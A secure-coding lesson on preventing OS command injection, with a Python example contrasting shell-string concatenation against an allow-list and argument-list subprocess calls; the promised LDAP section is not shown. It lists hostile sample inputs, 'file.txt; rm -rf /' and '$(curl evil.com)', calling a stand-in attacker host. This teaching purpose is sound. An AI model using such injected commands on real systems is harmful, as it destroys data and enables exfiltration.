Secure Coding & OWASP Top 10 for Backend · Lesson

Preventing Command & LDAP Injection

Learn how OS command injection and LDAP injection work and how to defend against them with safe APIs, allow-lists, and proper encoding.

Beyond SQL Injection

Injection is not limited to SQL. Any time untrusted input is mixed into a command interpreter, you risk injection. Two dangerous cousins are OS command injection and LDAP injection.

This lesson shows how both work and how to stop them.

How Command Injection Works

Command injection happens when user input is concatenated into a command string that is handed to a shell. Shell metacharacters like ;, &&, and |, and command substitution with $(...) or backticks, let an attacker append their own commands to the one the application intended.

  • Input file.txt; rm -rf / can delete data
  • Input $(curl evil.com) can exfiltrate or download
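As an added example (not part of the lesson), the concatenation pattern that creates the problem is shown beside the two defences the lesson names: an allow-list on the input and a safe API that passes arguments as a list so no shell ever parses them. The file name pattern, the wc command and the base directory are assumptions chosen for the illustration.

```python
# Added example, not the lesson's own code: vulnerable pattern vs. defences.
import os
import re
import subprocess
import tempfile

# Allow-list (assumption for this example): a plain file name made of
# letters, digits, dot, dash and underscore. Everything else is rejected,
# including ';', '&', '|', '$', '(', ')', '`', spaces and path separators.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def vulnerable_command(name: str) -> str:
    """Vulnerable pattern: input spliced into a shell string.
    With 'file.txt; rm -rf /' the shell would run a second command.
    Shown for contrast only; it is never executed in this example."""
    return "wc -l " + name  # would be passed to subprocess.run(..., shell=True)


def is_safe_name(name: str) -> bool:
    """Allow-list check, applied before the input reaches any API."""
    return bool(SAFE_NAME.fullmatch(name)) and name not in (".", "..")


def build_argv(base_dir: str, name: str) -> list:
    """Safe API: the command is an argument list, so the file name stays a
    single argument even if it contains shell metacharacters."""
    if not is_safe_name(name):
        raise ValueError("rejected input: %r" % name)
    return ["wc", "-l", os.path.join(base_dir, name)]


def count_lines(base_dir: str, name: str) -> int:
    # shell=False is the default: the program is exec'd directly with argv,
    # no shell is involved and no metacharacter is interpreted.
    result = subprocess.run(build_argv(base_dir, name),
                            capture_output=True, text=True, check=True)
    return int(result.stdout.split()[0])


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "file.txt"), "w") as f:
            f.write("a\nb\nc\n")
        print(count_lines(d, "file.txt"))  # 3
        for evil in ("file.txt; rm -rf /", "$(curl evil.com)"):
            try:
                count_lines(d, evil)
            except ValueError as err:
                print(err)  # rejected before any process is started
```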
